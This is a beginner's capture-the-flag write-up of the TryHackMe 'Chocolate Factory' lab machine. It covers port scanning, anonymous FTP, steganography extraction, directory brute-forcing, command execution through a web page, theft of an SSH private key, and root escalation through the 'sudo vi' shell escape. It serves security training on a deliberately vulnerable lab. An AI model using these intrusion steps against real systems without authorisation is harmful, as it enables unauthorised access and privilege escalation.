TryHackMe Chocolate Factory WriteUp
TryHackMe Chocolate Factory WriteUp
Hello and Welcome to my first writeup!Reconnaissance and Enumeration
first we scan the machine using nmap using the command:
1
nmap -sV [IP HERE]
nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
100/tcp open newacct?
106/tcp open pop3pw?
109/tcp open pop2?
110/tcp open pop3?
111/tcp open rpcbind?
113/tcp open ident?
119/tcp open nntp?
125/tcp open locus-map?
ftp enumeration
we login to ftp using username: “anonymous” and password: “anonymous”
in ftp found “gum_room.jpg”
used steghide to extract it:
1
steghide extract -sf gum_room.jpg
didnt put passphrase, b64.txt extracterd.
found what looks like a /etc/shadow file. didnt find anything usefull.
web enumeration
we open the webpage and find a login portal.
i used gobuster to enumrate directories.
1
2
3
4
5
6
7
8
9
10
11
"gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html"
gobuster: the name of the tool.
dir: specify we want to bruteforce directiories.
-u: specify the url
-w: specify the world list
-x: look for filees with exstinsions.
result:
1
2
3
4
5
6
7
8
9
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 1466]
/home.php (Status: 200) [Size: 569]
/validate.php (Status: 200) [Size: 93]
Initial Access:
we navigat to home.php, you can run commands in it.
we try the whoami command
it works! we search for users in the home directory using “ls /home”
found user charlie, we list the files, using “ls /home/charlie”
1
"cat /home/charlie/teleport"
Bingo! found ssh private key.
i copied it into id_rsa file then give it the right permissions using chmod +600
test if we can login using ssh to the user. the key works!
in /var/www/html i found a file named key_rev_key, i try to run it:
changed the permissions using chmod +x key_rev_key
since its a binary, we can check the file contents using strings key_rev_key
got the key!
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
in /var/www/html we cat
validate.php:
run validate.php , bingo we got charlies password :)
login to charlies account using “su charlie”.
user.txt
Privilege Escalation:
The first thing you should check for is sudo -l
, result:
1
2
3
4
5
6
7
8
Matching Defaults entries for charlie on chocolate-factory:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User charlie may run the following commands on chocolate-factory:
(ALL : !root) NOPASSWD: /usr/bin/vi
in gtfobins, vi -c ':!/bin/sh' /dev/null
i ran it with sudo so if it works we could get root privileges sudo vi -c ':!/bin/sh' /dev/null
1
charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null
pwned!!
Finding the root flag
we find root.py we run it , enter the key we obtained before , and it shows us the root flag.
Happy Pwning :)